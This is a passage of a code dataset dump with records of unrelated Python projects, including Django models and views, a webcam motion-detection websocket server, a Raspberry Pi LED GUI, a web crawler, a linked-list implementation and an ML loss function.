(('SKU_ID', 'condition', 'language'),)\n ordering = ['language','condition']\n\n def card_name(self):\n return self.SKU_ID.card_name\n\n def set(self):\n return self.SKU_ID.set\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.SKU_ID.SKU_ID + self.condition + self.language\n\n\nclass Order(models.Model):\n\n STATUS_CHOICES = (\n ('H', 'On Hold'),\n ('C', 'Completed'),\n )\n\n order_id = models.PositiveIntegerField(\n primary_key=True\n )\n\n customer_id = models.CharField(\n max_length = 20\n )\n\n total_price = models.DecimalField(\n max_digits=7,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return str(self.order_id)\n\n\nclass OrderItem(models.Model):\n\n order_id = models.ForeignKey(\n 'Order',\n on_delete=models.SET_NULL,\n null=True)\n\n product = models.ForeignKey(\n 'MTGSingle',\n on_delete=models.SET_NULL,\n null=True)\n\n qty = models.PositiveIntegerField(\n default = 0,\n )\n\n total_price = models.DecimalField(\n max_digits=7,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return str(self.pk)\n","repo_name":"MrRassoules/Gamer-Craze-Database","sub_path":"GamerCrazeProject/inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"21586332299","text":"import websockets\nimport asyncio\nimport cv2\nimport base64\nimport json\n\ncap = cv2.VideoCapture(0)\n\nport = 5000\nprint(\"Started server on port : \", port)\n\nasync def transmit(websocket, path):\n print(\"Client Connected !\")\n try :\n fourcc = cv2.VideoWriter_fourcc('X','V','I','D')\n out = cv2.VideoWriter(\"output.avi\", fourcc, 5.0, (1280,720))\n ret, frame1 = cap.read()\n ret, frame2 = cap.read()\n\n while cap.isOpened():\n color = \"\"\n \n # Create outline\n ret, frame = cap.read()\n if ret == True:\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n edges_high_thresh = cv2.Canny(gray, 60, 120)\n\n # Create movement detection via frame differencing\n diff = cv2.absdiff(frame1, frame2)\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5,5), 0)\n _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)\n dilated = cv2.dilate(thresh, None, iterations=3)\n contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n\n if cv2.contourArea(contour) < 7000:\n continue\n cv2.rectangle(frame1, (x, y), (x+w, y+h), (0, 255, 0), 2)\n cv2.putText(frame1, \"Status: {}\".format('Moving'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,\n 1, (0, 0, 255), 3)\n color = \"white\"\n\n image = cv2.resize(frame1, (620, 360))\n out.write(image)\n frame1 = frame2\n ret, frame2 = cap.read()\n\n if cv2.waitKey(40) == 27:\n break\n \n out.release()\n \n encoded_first = cv2.imencode('.jpg', image)[1]\n data_first = str(base64.b64encode(encoded_first))\n data_first = data_first[2:len(data_first)-1]\n\n encoded_second = cv2.imencode('.jpg', edges_high_thresh)[1]\n data_second = str(base64.b64encode(encoded_second))\n data_second = data_second[2:len(data_second)-1]\n\n result = {\n \"first_section\": data_first,\n \"second_section\": data_second,\n \"color\": color\n }\n\n response = 
json.dumps(result)\n            await websocket.send(response)\n        # release the video writer once the capture loop has ended\n        out.release()\n        cap.release()\n    except websockets.connection.ConnectionClosed as e:\n        print(\"Client Disconnected !\")\n        cap.release()\n    except Exception:\n        print(\"Something went Wrong !\")\n\nstart_server = websockets.serve(transmit, host=\"localhost\", port=port)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\ncap.release()","repo_name":"NjrexUI/quest-ai","sub_path":"App/lib/data/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15647309944","text":"from tkinter import*\nimport tkinter.font\nfrom gpiozero import LED\nimport RPi.GPIO\nRPi.GPIO.setmode(RPi.GPIO.BCM)\n\n### Hardware ###\nredled = LED(14)\ngreenled = LED(18)\nblueled = LED(24)\n\n### GUI Definitions ###\nwin = Tk()\nwin.title(\"5.2C\")\nmyFont = tkinter.font.Font(family = 'Helvetica', size = 12, weight = \"bold\")\nframe = Frame(win)\nframe.pack()\nr = StringVar(win,\"red\")\n\n### Event Functions ###\ndef GreenledToggle():\n    greenled.on()\n    redled.off()\n    blueled.off()\n    \ndef BlueledToggle():\n    blueled.on()\n    redled.off()\n    greenled.off()\n    \n    \ndef RedledToggle():\n    redled.on()\n    blueled.off()\n    greenled.off()\n    \ndef close():\n    RPi.GPIO.cleanup()\n    win.destroy()\n    \n### Widgets ###\nredledButton = Radiobutton(frame, text = 'Turn RED LED ON', font = myFont, command = RedledToggle, variable = r, value = 1)\nredledButton.pack(anchor = W)\n\ngreenledButton = Radiobutton(frame, text = 'Turn GREEN LED ON', font = myFont, command = GreenledToggle, variable = r, value = 2)\ngreenledButton.pack(anchor = W)\n\nblueledButton = Radiobutton(frame, text = 'Turn BLUE LED ON', font = myFont, command = BlueledToggle, variable = r, value = 3)\nblueledButton.pack(anchor = W)\n\nexitButton = Button(win, text = 'Exit', font = myFont, command = close, bg = 'red', height = 1, width = 6)\nexitButton.pack(padx = 5, pady = 5)\n\n### Exit cleanly ###\nwin.protocol(\"WM_DELETE_WINDOW\", close)\n\n### Loop forever ###\nwin.mainloop()\n \n","repo_name":"NitinDogra007/SIT210-Task5.2C-RPiGUI","sub_path":"5.2C RB.py","file_name":"5.2C RB.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38934884568","text":"import ImportMessage\nimport NPositionGram\nimport FrequentItemMining\n\n\ndef build_matrix(message_type,close_ngram):\n    \"\"\"\n    build the feature matrix to represent the messages\n    :param message_type: a message list\n    :param close_ngram: closed ngram list\n    :return: feature matrix\n    \"\"\"\n    matrix = [[0 for i in range(len(close_ngram))] for j in range(len(message_type))]\n    for i in range(len(message_type)):\n        for j in range(len(close_ngram)):\n            if close_ngram[j] in message_type[i]:\n                matrix[i][j] = 1\n    return matrix\n\n\nif __name__ == '__main__':\n    a = ImportMessage.import_file('S7_1.pcap')\n    b = ImportMessage.import_file('http.pcap')\n    c = a + b\n    # c = ImportMessage.import_file('DNS_packet.pcap')\n    text_type, mixed_type, bin_type = ImportMessage.MessageClassifier(c)\n    close_ngram = FrequentItemMining.get_close_ngram(text_type,'text',3,7,10,0.5)\n    for i in range(len(close_ngram)):\n        print(close_ngram[i])\n    print(\"\")\n    for message in mixed_type:\n        print(message)\n    feature_matrix = build_matrix(text_type,close_ngram)\n    for i in range(len(feature_matrix)):\n        
print(feature_matrix[i])","repo_name":"liyihao17/FIMMC","sub_path":"FeatureBuild.py","file_name":"FeatureBuild.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32313498070","text":"#from marshmallow import Schema, fields, validate\n#from marshmallow.decorators import post_load\nfrom main.models.message_model import MessageModel\nfrom marshmallow_sqlalchemy import SQLAlchemyAutoSchema, fields\nfrom .user_schema import UserSchema\n\n\n'''class MessageSchema(Schema):\n    id = fields.Int(dump_only = True)\n    sender_id = fields.Int(required = True)\n    receptor_id = fields.Int(required = True)\n    message = fields.Str(required = True)\n    #user = fields.Nested('users', many = True, exclude = ('message',))\n\n    @post_load\n    def make_message(self, data, **kwargs):\n        return MessageModel(**data)'''\n\n\nclass MessageSchema(SQLAlchemyAutoSchema):\n    class Meta:\n        model = MessageModel\n        load_instance = True\n        include_relationships = True\n        include_fk = True\n\n\n    sender = fields.Nested((UserSchema), exclude =('nutritional_records', 'messages_sent', 'messages_recept',))\n    receptor = fields.Nested((UserSchema), exclude =('nutritional_records', 'messages_sent', 'messages_recept',))\n\n\n\n\n","repo_name":"DaniBeato/ReNuDia","sub_path":"backend/main/maps/message_schema.py","file_name":"message_schema.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"17796568749","text":"import requests\nfrom bs4 import BeautifulSoup\nimport logging\nimport time\nimport os.path\nimport base64\nimport argparse\nfrom util import download_url, parse_reddit_post\nimport re\nfrom collections import deque\n\nclass Crawler(object):\n\tdef __init__(self, start_url, storage_dir, urls_to_crawl):\n\t\tself.start_url = start_url\n\t\tself.storage_dir = storage_dir\n\t\tself.urls_to_crawl = urls_to_crawl\n\n\t@staticmethod\n\tdef _make_absolute_url(url):\n\t\treturn 'http://reddit.com' + url\n\n\tdef crawl_reddit(self):\n\t\tcurrent_page_url = self.start_url\n\t\tlogging.getLogger('requests').setLevel(logging.WARNING)\n\t\tlogging.debug('Starting to crawl page {}'.format(self.start_url))\n\n\t\t#headers = {'User-Agent': 'SearchingBot 0.1'}\t\n\t\tok_url_count = 0\n\t\terror_url_count = 0\n\t\twhile True:\t\n\t\t\t\n\t\t\tif (ok_url_count + error_url_count) % 100 == 0:\n\t\t\t\tlogging.info(\"Crawled {} oks - {} errors\".format(ok_url_count, error_url_count))\n\t\t\tcurrent_page = download_url(current_page_url) # requests.get(current_page_url, headers=headers) \n\t\t\tlogging.debug('Current page: {}'.format(current_page_url))\n\n\t\t\tsoup = BeautifulSoup(current_page, 'html.parser')\n\t\t\tlinks = [Crawler._make_absolute_url(a['href']) for a in soup.find_all('a', attrs={'class': 'title'})\n\t\t\t\t\tif not (a['href'].startswith('http') or a['href'].startswith('javascript'))]\n\t\t\ttry:\t\n\t\t\t\tfor link in links:\n\t\t\t\t\tok_url_count += 1\n\t\t\t\t\thtml = download_url(link)\n\t\t\t\t\tstored_text_file_name = os.path.join(self.storage_dir, base64.b16encode(link))\n\t\t\t\t\twith open(stored_text_file_name, 'w') as storage_file:\n\t\t\t\t\t\tstorage_file.write(html.encode('utf-8'))\n\t\t\t\t\ttime.sleep(2)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error(u'Error occurred while crawling {}'.format(current_page_url))\n\t\t\t\tlogging.exception(e)\n\t\t\t\terror_url_count += 1\n\n\t\t\tnext_page_url = soup.find('a', 
attrs={'rel': 'next'})['href']\n\t\t\tlogging.debug('First post is {}'.format(links[0]))\n\t\t\tcurrent_page_url = next_page_url\n\t\t\tok_url_count += 1\n\t\t\ttime.sleep(2)\n\n\tdef crawl_wikipedia(self):\n\n\t\tdef check_a_node(a):\n\t\t\tif a and a.get('href', None):\n\t\t\t\turl = a['href']\n\t\t\t\tignore_urls_starts = ['/wiki/Wikipedia', '/wiki/Special', '/wiki/Category',\n\t\t\t\t\t'/wiki/Template_talk',\n\t\t\t\t\t'/wiki/Book', '/wiki/Template', '/wiki/Talk', '/wiki/BookSources', '/wiki/File']\n\t\t\t\tif url.startswith('/wiki') and not url.split(':')[0] in ignore_urls_starts:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\n\t\tdef make_absolute_wiki_url(url):\n\t\t\treturn 'https://en.wikipedia.org' + url\n\n\t\tdef prepare_url(url):\n\t\t\treturn make_absolute_wiki_url(re.split(r'#', url)[0])\n\n\t\tstart_time = time.time()\n\t\tcurrent_page_url = self.start_url\n\t\tlogging.getLogger('requests').setLevel(logging.WARNING)\n\t\tlogging.debug('Starting to crawl page {}'.format(self.start_url))\n\n\t\t#headers = {'User-Agent': 'SearchingBot 0.1'}\t\n\t\tok_url_count = 0\n\t\terror_url_count = 0\n\t\turl_number = 0\n\t\tlinks_to_crawl = deque()\n\t\tlinks_to_crawl.append(current_page_url)\n\t\tcrawled_links = set()\n\t\twhile True:\t\n\t\t\turl = links_to_crawl.popleft()\n\t\t\tif not url.startswith('https://en.wikipedia.org') or url in crawled_links:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif (ok_url_count + error_url_count) % 100 == 0:\n\t\t\t\tlogging.info(\"Crawled {} oks - {} errors\".format(ok_url_count, error_url_count))\n\t\t\ttry:\n\t\t\t\tcurrent_page = download_url(url)\n\t\t\t\tlogging.debug('{}. 200: {}'.format(url_number, url))\n\t\t\texcept Exception as e:\n\t\t\t\tstatus_code = str(e)\n\t\t\t\tlogging.warning('{}. {}: {}'.format(url_number, status_code, url))\n\t\t\t\tcontinue\n\t\t\turl_number += 1\n\n\t\t\tsoup = BeautifulSoup(current_page, 'html.parser')\n\t\t\tfor tag in soup(['style', 'script']):\n\t\t\t\ttag.extract()\n\n\t\t\tlinks_to_crawl.extend(\n\t\t\t\t[prepare_url(a['href'])\tfor a in soup.find_all('a') if check_a_node(a)])\n\t\t\ttry:\t\t\t\t\t\n\t\t\t\tstored_text_file_name = os.path.join(self.storage_dir, base64.b16encode(url))\n\t\t\t\twith open(stored_text_file_name, 'w') as storage_file:\n\t\t\t\t\tstorage_file.write(soup.get_text().encode('utf-8'))\n\t\t\t\t# time.sleep(2)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error(u'Error occurred while crawling {}'.format(current_page_url))\n\t\t\t\tlogging.exception(e)\n\t\t\t\terror_url_count += 1\n\t\t\tok_url_count += 1\n\t\t\tcrawled_links.add(url)\n\t\t\tif ok_url_count >= self.urls_to_crawl:\n\t\t\t\tbreak\n\t\tlogging.debug('Total time: {}'.format(time.time() - start_time))\n\t\t\t# time.sleep(2)\t\t\t\n\n\ndef main():\n\tlogging.getLogger().setLevel(logging.DEBUG)\n\tparser = argparse.ArgumentParser(description='Crawl /r/astronomy/')\n\tparser.add_argument('--start_url', dest='start_url', required=True)\n\tparser.add_argument('--storage_dir', dest='storage_dir', required=True)\n\tparser.add_argument('--urls_count', dest='urls_count', type=int)\n\targs = parser.parse_args()\n\t#print args.start_url\n\turls_to_crawl = args.urls_count if hasattr(args, 'urls_count') else 3000\n\tcrawler = Crawler(args.start_url, args.storage_dir, urls_to_crawl)\n\tcrawler.crawl_wikipedia()\n\t\n\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"electroprovodka/search_engine","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6565482584","text":"def main():\n    '''\n    Write a program that receives a string from the user.\n    The program prints the string without its vowels.\n    '''\n    text = input('Informe uma palavra ou frase qualquer: ')\n    vogais = ['a', 'e', 'i', 'o', 'u']\n    \n    for x in vogais:\n        text = text.replace(x, '')\n    print(text)\n    \n\nif __name__ == '__main__':\n    main()","repo_name":"VicMCA/PythonSamples","sub_path":"ex-strings08_texto-sem-vogais.py","file_name":"ex-strings08_texto-sem-vogais.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"16841960296","text":"'''\nCreated on Jul 29, 2018\n\n@author: MOHIT\n'''\nfrom DSpython.LinkedList.LinkedList.Node import Node\n\n\n\n\nclass list_block:\n    count = 1\n\n    def __init__(self):\n        self.__head = None\n        self.__tail = None\n        self.__next = None\n        self.__nodeCount = 0\n        self.__blockNumber = list_block.count\n        list_block.count += 1\n\n    def get_next(self):\n        return self.__next\n\n    def set_next(self, value):\n        self.__next = value\n\n    def get_block_number(self):\n        return self.__blockNumber\n\n    def set_block_number(self, value):\n        self.__blockNumber = value\n\n    def get_head(self):\n        return self.__head\n\n    def get_tail(self):\n        return self.__tail\n\n    def get_node_count(self):\n        return self.__nodeCount\n\n    def set_head(self, value):\n        self.__head = value\n\n    def set_tail(self, value):\n        self.__tail = value\n\n    def set_node_count(self, value):\n        self.__nodeCount = value\n\n\nclass Unrolled_list():\n    \n    __blockSize=2\n    \n    def __init__(self):\n        self.__head = None\n        self.__tail = None\n\n    def get_head(self):\n        return self.__head\n\n    def get_tail(self):\n        return self.__tail\n\n    def set_head(self, value):\n        self.__head = value\n\n    def set_tail(self, value):\n        self.__tail = value\n\n    def length_list(self):\n        if self.get_head() is None:\n            return 0\n        else:\n            i = 0\n            block = self.get_head()\n            while block is not None:\n                temp = block.get_head()\n                while temp.get_next() is not block.get_head():\n                    i += 1\n                    temp = temp.get_next()\n                i+=1 \n                block = block.get_next()\n            return i\n\n    def display_list(self):\n        if self.get_head() is None:\n            return \"List is empty\"\n        else:\n            block = self.get_head()\n            while block is not None:\n                print(\"\\nThe block number is : \", block.get_block_number())\n                temp = block.get_head()\n                print(temp.get_data(), end=\" \")\n                temp = temp.get_next()\n                while temp is not block.get_head():\n                    print(temp.get_data(), end=\" \")\n                    temp = temp.get_next()\n                block = block.get_next()\n\n    def total_block_number(self):\n        if self.get_head() is None:\n            return 0\n        else:\n            block = self.get_head()\n            i = 0\n            while block is not None:\n                i += 1\n                block = block.get_next()\n            return i\n\n    def add_element(self, blockNumber, data):\n        if(self.get_head() is None):\n            blockHead = list_block()\n            new_node = Node(data)\n            self.set_head(blockHead)\n            blockHead.set_head(new_node)\n            blockHead.set_tail(new_node)\n            blockHead.get_head().set_next(new_node)\n            blockHead.set_node_count(blockHead.get_node_count()+1)\n        else:\n            if blockNumber == 1:\n                block = self.get_head()\n                new_node = Node(data)\n                block.get_tail().set_next(new_node)\n                new_node.set_next(block.get_head())\n                block.set_head(new_node)\n                block.set_node_count(block.get_node_count()+1)\n                
self.shift()\n elif blockNumber>self.total_block_number():\n print(\"blockNumber exceeds the actual number of blocks\")\n return\n else:\n i=1\n block = self.get_head()\n new_node = Node(data)\n while i is not blockNumber:\n block=block.get_next()\n i+=1\n temp=block.get_tail()\n temp.set_next(new_node)\n new_node.set_next(block.get_head())\n block.set_head(new_node)\n block.set_node_count(block.get_node_count()+1)\n self.shift()\n \n def shift(self):\n block = self.get_head()\n while block is not None:\n while block.get_node_count()>Unrolled_list.__blockSize:\n temp = block.get_head()\n shift_node = block.get_tail()\n while temp.get_next() is not block.get_tail():\n temp = temp.get_next() \n temp.set_next(block.get_head())\n block.set_tail(temp)\n if block.get_next()==None:\n new_block = list_block()\n block.set_next(new_block)\n new_block.set_head(shift_node)\n new_block.set_tail(shift_node)\n new_block.get_tail().set_next(new_block.get_head())\n block.set_node_count(block.get_node_count()-1)\n new_block.set_node_count(new_block.get_node_count()+1)\n else:\n next_block= block.get_next()\n next_block.get_tail().set_next(shift_node)\n shift_node.set_next(next_block.get_head())\n next_block.set_head(shift_node)\n block.set_node_count(block.get_node_count()-1)\n next_block.set_node_count(next_block.get_node_count()+1)\n block = block.get_next() \n \n def get_element(self,k):\n if k<=0 or k>self.length_list():\n return \"Invalid index\"\n else:\n j = (k+1)//Unrolled_list.__blockSize #item exist in block j\n m = k - (Unrolled_list.__blockSize*(j-1)) #mth item is required in jth block\n l=1\n block = self.get_head()\n while l List[List[int]]:\n res = []\n nums.sort()\n self.dfs(nums, [], res)\n return res\n\n def dfs(self, nums, path, res):\n if not nums:\n res.append(path)\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n self.dfs(nums[:i] + nums[i+1:], path + [nums[i]], res)","repo_name":"KOPFYF/LCEveryday","sub_path":"Graph/DFS_Recursion/permuteUnique47.py","file_name":"permuteUnique47.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21976930969","text":"def Mesure():\n Frame1 = Frame(Window)\n Frame1.place(relx=0.3, rely=0.275, relheight=0.51, relwidth=0.4558)\n Frame1.configure(relief='solid')\n Frame1.configure(borderwidth=\"0\")\n Frame1.configure(relief=\"solid\")\n Frame1.configure(background=\"white\")\n\n Labelframe12 = LabelFrame(Frame1)\n Labelframe12.place(relx=0.012, rely=0.0, relheight=0.099\n , relwidth=0.285)\n Labelframe12.configure(relief='solid')\n Labelframe12.configure(foreground=\"black\")\n Labelframe12.configure(text='''QoS (qualité de service)''')\n Labelframe12.configure(background=\"white\")\n\n Label1 = Label(Frame1)\n Label1.place(relx=0.089, rely=0.203, height=21, width=150)\n Label1.configure(background=\"white\")\n Label1.configure(disabledforeground=\"#a3a3a3\")\n Label1.configure(foreground=\"#000000\")\n Label1.configure(text='''La perte de paquets''', anchor=W)\n\n Label2 = Label(Frame1)\n Label2.place(relx=0.089, rely=0.303, height=21, width=150)\n Label2.configure(background=\"white\")\n Label2.configure(disabledforeground=\"#a3a3a3\")\n Label2.configure(foreground=\"#000000\")\n Label2.configure(text='''La gigue''', anchor=W)\n\n Label3 = Label(Frame1)\n Label3.place(relx=0.089, rely=0.403, height=21, width=150)\n Label3.configure(background=\"white\")\n Label3.configure(disabledforeground=\"#a3a3a3\")\n 
Label3.configure(foreground=\"#000000\")\n Label3.configure(text='''La latence''', anchor=W)\n\n Label4 = Label(Frame1)\n Label4.place(relx=0.089, rely=0.503, height=21, width=150)\n Label4.configure(background=\"white\")\n Label4.configure(disabledforeground=\"#a3a3a3\")\n Label4.configure(foreground=\"#000000\")\n Label4.configure(text='''La bande passante''', anchor=W)\n\n Label5 = Label(Frame1)\n Label5.place(relx=0.092, rely=0.603, height=21, width=160)\n Label5.configure(background=\"white\")\n Label5.configure(disabledforeground=\"#a3a3a3\")\n Label5.configure(foreground=\"#000000\")\n Label5.configure(text='''La note d'opinion moyenne''', anchor=W)\n\n Label6 = Label(Frame1)\n Label6.place(relx=0.092, rely=0.703, height=21, width=150)\n Label6.configure(background=\"white\")\n Label6.configure(disabledforeground=\"#a3a3a3\")\n Label6.configure(foreground=\"#000000\")\n Label6.configure(text='''Localisation ''', anchor=W)\n\n Entry1 = ttk.Entry(Frame1)\n Entry1.place(relx=0.385, rely=0.203, height=20, relwidth=0.198)\n\n Entry2 = ttk.Entry(Frame1)\n Entry2.place(relx=0.385, rely=0.303, height=20, relwidth=0.198)\n\n Entry3 = ttk.Entry(Frame1)\n Entry3.place(relx=0.385, rely=0.403, height=20, relwidth=0.198)\n\n Entry4 = ttk.Entry(Frame1)\n Entry4.place(relx=0.385, rely=0.503, height=20, relwidth=0.198)\n\n Entry5 = ttk.Entry(Frame1)\n Entry5.place(relx=0.385, rely=0.603, height=20, relwidth=0.191)\n\n Entry6 = ttk.Entry(Frame1)\n Entry6.place(relx=0.385, rely=0.703, height=20, relwidth=0.198)\n\n def DataRec():\n ppT = Entry1.get()\n gigue = Entry2.get()\n latence = Entry3.get()\n Bp = Entry4.get()\n NopMoy = Entry5.get()\n location = Entry6.get()\n if int(ppT) > 10:\n print(\"red\")\n else:\n print(\"vert\")\n\n Window.BTNValide = ttk.Button(Frame1, style=\"AccentButton\")\n Window.BTNValide.place(relx=0.5, rely=0.8, height=30, width=110)\n Window.BTNValide.configure(text=\"Mesures\")\n Window.BTNValide.configure(command=DataRec)\n","repo_name":"ImedZeiri/Subdivision-de-qualit-et-optimisation-des-r-seaux-mobiles","sub_path":"FrontEnd/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"31936290125","text":"import pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport scipy.stats\r\nimport matplotlib.pyplot as plt\r\nimport pylab\r\n\r\ndata = pd.read_csv('residualtest.csv')\r\nx = data['residual']\r\n\r\n#Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test\r\nshapiro_test, shapiro_p = scipy.stats.shapiro(x)\r\nprint(\"Shapiro-Wilk Stat:\",shapiro_test, \" Shapiro-Wilk p-Value:\", shapiro_p)\r\n\r\nk2, p = scipy.stats.normaltest(x)\r\nprint('p:',p)\r\n\r\n\r\n#Another method to determining normality is through Quantile-Quantile Plots.\r\nscipy.stats.probplot(x, dist=\"norm\", plot=pylab)\r\npylab.show()\r\n\r\n\r\ndef ecdf(data):\r\n #Compute ECDF\r\n n = len(data)\r\n x = np.sort(data)\r\n y = np.arange(1, n+1) / n\r\n return x, y\r\n\r\n# Compute empirical mean and standard deviation\r\n\r\n# Number of samples\r\nn = len(data['residual'])\r\n\r\n# Sample mean\r\nmu = np.mean(data['residual'])\r\n\r\n# Sample standard deviation\r\nstd = np.std(data['residual'])\r\n\r\nprint('Mean residual: ', mu, 'with standard deviation of +/-', std)\r\n\r\n#Random sampling of the data based off of the mean of the data.\r\nnormalized_sample = np.random.normal(mu, std, size=10000)\r\nx_temperature, y_temperature = 
ecdf(data['residual'])\r\nnormalized_x, normalized_y = ecdf(normalized_sample)\r\n\r\n# Plot the ECDFs\r\nfig = plt.figure(figsize=(8, 5))\r\nplt.plot(normalized_x, normalized_y)\r\nplt.plot(x_temperature, y_temperature, marker='.', linestyle='none')\r\nplt.ylabel('ECDF')\r\nplt.xlabel('Residual')\r\nplt.legend(('Normal Distribution', 'Sample data'))\r\nplt.show()","repo_name":"bokunopica/OLS-","sub_path":"resi-normtest.py","file_name":"resi-normtest.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"41705963851","text":"# code is taken from https://www.kaggle.com/yerramvarun/cassava-taylorce-loss-label-smoothing-combo\n# implementations reference - https://github.com/CoinCheung/pytorch-loss/blob/master/pytorch_loss/taylor_softmax.py\n# paper - https://www.ijcai.org/Proceedings/2020/0305.pdf\nimport torch\nimport torch.nn as nn\nfrom losses.factory import LabelSmoothingLoss, LabelSmoothingOneHot\n\n\nclass TaylorSoftmax(nn.Module):\n\n def __init__(self, dim=1, n=2):\n super(TaylorSoftmax, self).__init__()\n assert n % 2 == 0\n self.dim = dim\n self.n = n\n\n def forward(self, x):\n fn = torch.ones_like(x)\n denor = 1.\n for i in range(1, self.n + 1):\n denor *= i\n fn = fn + x.pow(i) / denor\n out = fn / fn.sum(dim=self.dim, keepdims=True)\n return out\n\n\nclass TaylorCrossEntropyLoss(nn.Module):\n\n def __init__(self, num_classes,\n n=2, ignore_index=-1, reduction='mean', smoothing=0.2, onehot=True):\n super(TaylorCrossEntropyLoss, self).__init__()\n assert n % 2 == 0\n self.taylor_softmax = TaylorSoftmax(dim=1, n=n)\n self.reduction = reduction\n self.ignore_index = ignore_index\n if onehot:\n self.lab_smooth = LabelSmoothingOneHot(smoothing=smoothing, log_softmax=False)\n else:\n self.lab_smooth = LabelSmoothingLoss(num_classes, smoothing=smoothing, log_softmax=False)\n\n def forward(self, logits, labels):\n log_probs = self.taylor_softmax(logits).log()\n # loss = F.nll_loss(log_probs, labels, reduction=self.reduction,\n # ignore_index=self.ignore_index)\n loss = self.lab_smooth(log_probs, labels)\n return loss\n","repo_name":"sooperset/cassava-leaf-disease-classification","sub_path":"losses/taylor_cross_entropy.py","file_name":"taylor_cross_entropy.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"26586915779","text":"import os\nimport requests\nfrom django.shortcuts import render, redirect\nfrom .forms import User_city\nfrom .models import UserCity\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\nos.chdir('./weather')\n\n@login_required()\ndef get_city(request):\n if request.method == 'POST':\n form = User_city(request.POST)\n if form.is_valid():\n city = form.cleaned_data.get('city')\n user_city, created = UserCity.objects.get_or_create(user=request.user)\n\n user_city.city = city\n user_city.save()\n return redirect(\"/weather\")\n else:\n messages.error(request, \"Enter a valid city\")\n else:\n form = User_city()\n context = {\n 'form': form\n }\n return render(request, 'weather/city.html', context)\n\n\n@login_required()\ndef all_users_weather(request):\n\n with open(\"./hidden/API_KEY.txt\", \"r\") as api_file:\n line = api_file.readline()\n API_KEY = line.strip(\"\\n\")\n\n current_weather_url = \"https://api.openweathermap.org/data/2.5/weather?q={}&appid={}\"\n cities = UserCity.objects.all()\n\n weather_data_dict = 
{}\n for city_obj in cities:\n city = city_obj.city\n weather_data = find_weather(city,API_KEY, current_weather_url)\n\n weather_data_dict[city_obj.user] = weather_data\n sorted_weather_data = dict(\n sorted(weather_data_dict.items(), key=lambda item: item[1]['temperature'], reverse=True))\n\n context = {\n 'weather_data': sorted_weather_data,\n }\n\n return render(request, 'weather/weather-users.html', context=context)\n\n\n\ndef find_weather(city, api_key, current_weather_url):\n response = requests.get(current_weather_url.format(city, api_key)).json()\n\n weather_data = {\n 'city': city,\n 'temperature': round(response['main']['temp'] - 273.15, 2),\n 'icon': response['weather'][0]['icon']\n }\n return weather_data\n","repo_name":"kirillkiselev-slim/MyPortfolio","sub_path":"AppShare/weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30418406603","text":"import time\n\nfrom foamgraph import mkQApp\nfrom foamgraph.backend.QtCore import QEventLoop, QTimer\n\napp = mkQApp()\n\n\ndef processEvents(timeout=0.05):\n for _ in range(2):\n app.processEvents(\n QEventLoop.ProcessEventsFlag.WaitForMoreEvents)\n time.sleep(0.01)\n time.sleep(timeout)\n","repo_name":"zhujun98/foamgraph","sub_path":"foamgraph/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"82"} +{"seq_id":"35585361205","text":"import json\nimport os\n\nfrom io import open\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Optional\n\n\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib2 import 